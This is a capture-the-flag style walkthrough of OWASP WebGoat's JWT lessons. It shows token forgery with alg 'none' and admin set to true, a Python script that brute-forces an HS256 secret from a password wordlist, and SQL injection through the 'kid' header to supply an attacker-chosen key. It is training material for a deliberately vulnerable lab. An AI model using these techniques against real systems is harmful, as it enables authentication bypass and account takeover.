# JWT Token

### 3/&#x20;

Use jwt.io to decode token, you will get username.

### 5/&#x20;

After decode, you will see algorithm is HS256 and admin is false.

First, edit alg to "none". Next edit admin value to "true"

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2F4zjIGFxWqjoOX7fCGNBd%2Fimage.png?alt=media\&token=9acfab8b-2a05-4263-a4b6-354a9d303a05)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FUkKNK3NlrlD3huL50IHm%2Fimage.png?alt=media\&token=29975415-87bb-422c-a9b7-120213f26959)

Edit cookie and send:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FkWlNKx5fGUmv4xoQYrC8%2Fimage.png?alt=media\&token=293c6664-5727-4232-a84f-19f878dea2ea)

### 8/

```
eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDE1MDk3MiwiZXhwIjoxNjQwMTUxMDMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.dlRNogwJ7D5mrP2ZvXlG5LW1d1U-vqq4DNld1EeN-FA
```

First, we must to find key of this token, after that change the username field in this token to 'WebGoat' to solve this challenge (The algorithm is HS256).

I use [1000000-password-seclists.txt](https://raw.githubusercontent.com/duyet/bruteforce-database/master/1000000-password-seclists.txt) to brute force.

Code to find key:

```python
import jwt
jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDEzOTY5NywiZXhwIjoxNjQwMTM5NzU3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.1XUCWT94XEVfGV1OBGV4cLMJhqCMbzWzZI39I01Exmc'
with open('1000000-password-seclists.txt') as f:
    for line in f:
        key = line.strip()
        try:
            jwt.decode(jwt_str, key, algorithms='HS256')
            print('Key found : ',key)
            break
        except jwt.exceptions.ExpiredSignatureError:
            print('Key found : ',key)
            break
        except jwt.exceptions.InvalidSignatureError:
            continue
    else:
        print("No key found.")
```

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FJy2JtGrG2COnos1cujFT%2Fimage.png?alt=media\&token=5d440494-5bbd-4185-9273-573387ad1354)

I found that the key is victory, use this key to decode and change username to WebGoat:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FcgWhyrlLGLEuHxKQm2S3%2Fimage.png?alt=media\&token=9b282495-dcdb-4086-b9b9-193a21d94634)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FbqrlfDJwFoYjbRkqdYay%2Fimage.png?alt=media\&token=ed1e7f5c-6030-4a9c-8e40-0491ebe0e4af)

And then when We submit we will receive message that the jwt token is expired:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FN586uy5OUZzVZNWmKrdi%2Fimage.png?alt=media\&token=1baaa0ba-deef-469f-b055-471df9381565)

Change exp value and submit token again, we will solve this challenge:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FJt6D83KsgXOub4Cn0CWI%2Fimage.png?alt=media\&token=26b8a5ff-443b-49f9-a8d7-bc6333dfa3ba)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FvZFgQYuAH11xCtlUdAgg%2Fimage.png?alt=media\&token=e743de67-4d62-434d-803b-f0e158d3d2da)

### 10/

This challenge is similar to [challenge 5](#5).

Go to file logs.txt, we will get token:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2F72gKAnHLbt6JHVb7rTao%2Fimage.png?alt=media\&token=a1b0405c-cbe6-43a3-859d-05f7a1d9f837)

Modify request with Burpsuite, we will see Authorization header:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FD8QlRbU9nIyUAMjcdKjv%2Fimage.png?alt=media\&token=341319ee-6d7d-4dc2-95bb-54134da34bdb)

We will edit the token we got and then use it to set value for Authorization header:

The algorithm is "None":

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FQk7IfWKNviXnnQsK1dPD%2Fimage.png?alt=media\&token=dd07cc92-b9ca-438e-885d-097c972232b4)

Edit admin field to "true":

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FzecMYNvDJz8pkchv8zmX%2Fimage.png?alt=media\&token=6ccce0eb-8278-416d-bdf2-74cc7a95b734)

Send request with new token, we will solve the challenge:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FWiqPQEPsffVq4Uni9d2r%2Fimage.png?alt=media\&token=a32d1d2c-1235-47a7-98c5-4389510863b3)

### 11/

First, use [jwt.io](https://jwt.io) to decode:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FYUuTLeCz1vobHV7qj9ZW%2Fimage.png?alt=media\&token=61bae254-2308-49e0-9e22-e4916e36e69a)

In header, you will see "kid", It seems different from other challenges.

Take a look at [source code in WebGoat's github](https://github.com/WebGoat/WebGoat/blob/develop/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTFinalEndpoint.java):

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FfQYbHZsGSWvlxmVNOCkB%2Fimage.png?alt=media\&token=4e9800d0-1343-42da-8e84-c93a43939881)

Here we can see, the key will be selected from the database where id=kid. We can use SQLI to make it return your own key:

Some thing we can use like this:

```sql
' union select 'key' from INFORMATION_SCHEMA.SYSTEM_USERS; --
```

When the query is executed, the key use to encode jwt is 'key' (your own key).

But one more step, you can see, before use this value as a key for jwt, it must be base64 decode first:

```java
TextCodec.BASE64.decode(rs.getString(1));
```

So we must edit the value for kid o to:

```sql
' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --
```

And finally, edit username to "Tom", delete exp and use 'key' as key:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FwjVtHE4Y1qUjJrByqXwa%2Fimage.png?alt=media\&token=8df04ada-500b-478a-ad70-a6009ee88abf)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2F5HUV2J903HovmhsoFvcn%2Fimage.png?alt=media\&token=c0ea1e87-2145-4906-bd2f-f758df7b93fe)

Submit new token and solve the challenge:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FnRNlPR6Ha4BXtlcpWkjn%2Fimage.png?alt=media\&token=ef87e0f4-a0ab-4fb5-a36e-46c556f09d10)